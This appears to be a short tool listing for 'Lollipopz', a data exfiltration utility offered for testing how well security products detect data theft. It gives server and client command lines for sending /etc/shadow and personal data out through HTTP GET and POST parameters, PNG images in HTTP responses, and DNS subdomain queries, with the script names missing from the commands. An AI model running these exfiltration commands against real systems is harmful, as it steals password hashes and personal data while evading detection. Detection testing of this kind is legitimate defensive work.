Lollipopz is a data exfiltration utility for testing detection capabilities. Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.

Exfiltration How-To?

/etc/shadow -> HTTP GET requests

  • Server

# ./ -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log

  • Client

$ ./ -m lollipopz.methods.http.param_cipher.GETClient -rh -rp 80 -i ./samples/shadow.txt -r

/etc/shadow -> HTTP POST requests

  • Server

# ./ -m lollipopz.methods.http.param_cipher.POSTServer -lp 80 -o output.log

  • Client

$ ./ -m lollipopz.methods.http.param_cipher.POSTClient -rh -rp 80 -i ./samples/shadow.txt -r

Also Read – Tails : Live System To Preserve Your Privacy & Anonymity

PII -> PNG embedded in HTTP Response

  • Server

$ ./ -m lollipopz.methods.http.image_response.Server -lp 37650 -o output.log

  • Client

# ./ -m lollipopz.methods.http.image_response.Client -rh -rp 37650 -lp 80 -i ./samples/pii.txt -r

PII -> DNS subdomains querying

  • Server

# ./ -m lollipopz.methods.dns.subdomain_cipher.Server -lp 53 -o output.log

  • Client

$ ./ -m lollipopz.methods.dns.subdomain_cipher.Client -rh -rp 53 -i ./samples/pii.txt -r